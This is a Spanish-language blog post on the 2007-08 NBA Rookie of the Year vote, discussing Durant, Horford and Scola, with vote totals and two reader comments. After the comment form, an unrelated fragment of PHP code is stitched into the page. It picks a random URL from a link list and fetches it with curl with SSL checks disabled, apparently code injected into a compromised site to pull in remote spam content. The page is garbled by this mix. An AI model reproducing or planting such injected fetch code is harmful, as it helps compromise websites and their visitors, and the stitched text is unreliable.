Los premios de la 2007-2008: Rookie of the Year

01 de May de 2008 por MagicJohnson32

durantwinnermavsLa lesión de Greg Oden el pasado verano, motivo por el cual aún no le hemos visto jugar como Blazer, dejó todos los pronósticos sobre el RoY muy favorables a Kevin Durant. La apuesta de los Sonics fue clara y, sin Allen ni Lewis en el equipo, Durant contaría con carta blanca. Hasta aquí, las previsiones se han cumplido a rajatabla. Tal vez no era tan previsible la terrible, patética por momentos, imagen ofrecida por Seattle esta campaña, pese a que no se esperaba gran cosa de ellos. Esto ha lastrado a Durant, que en ocasiones se ha mostrado más egoísta que brillante, ha anotado mucho a costa de lanzar demasiado y, sobre todo, de aportar poco en otros aspectos. Y los Sonics han perdido compulsivamente.

Respecto a los otros candidatos, esto resta puntos a Durant de cara al galardón… pero no los suficientes como para desbancarlo. Al Horford ha rendido a la altura de los pronósticos más optimistas y se ha ganado comparaciones con Boozer y una plaza fija en el quinteto inicial. No es que los Hawks hayan hecho una regular season memorable pero al fin han sido competitivos y se han metido en los Playoffs por primera vez en seis temporadas. Además, mantienen muy viva una eliminatoria ante los Celtics que se preveía corta. Horford, definitivamente, ha aportado y ha dotado de solidez a un equipo que necesitaba desesperadamente un jugador como él.alhorcelts

Lo de Scola, tal vez, tiene incluso más mérito. No sólo ha demostrado el nivel que lo convirtió en estrella del basket FIBA, sino que ha sido clave en la exitosa fase regular de los Rockets, un equipo que ha entrado en los libros de historia gracias a la racha de 22 triunfos consecutivos. Scola contó muy poco al inicio pero su intensidad, clase y experiencia le acabaron abriendo las puertas al cinco inicial. El argentino, además, se creció ante la lesión de Yao y firmó un sensacional último tercio de fase regular.

En definitiva, si en el premio al Mejor Rookie del Año se tuviese en cuenta el factor ‘V’ (la ‘V’ de MVP), habría mucho que discutir. Y posiblemente el factor V ha sido lo que haya llevado al comité de sabios de TJNBA a votar como Rookie of the Year a…

  1. Al Horford 81
  2. Kevin Durant 59
  3. Luis Scola 28
  4. Al Thornton 3
Comenta

2 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Durant ha ganado en NBA.com por la diferencia(en relación a los votos) con las misma diferencia que Horford ha ganado en TJNBA.

      Citar

  2. TheDeerHunter dice:
    #2

    Será que tienen un criterio simétrico al nuestro 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>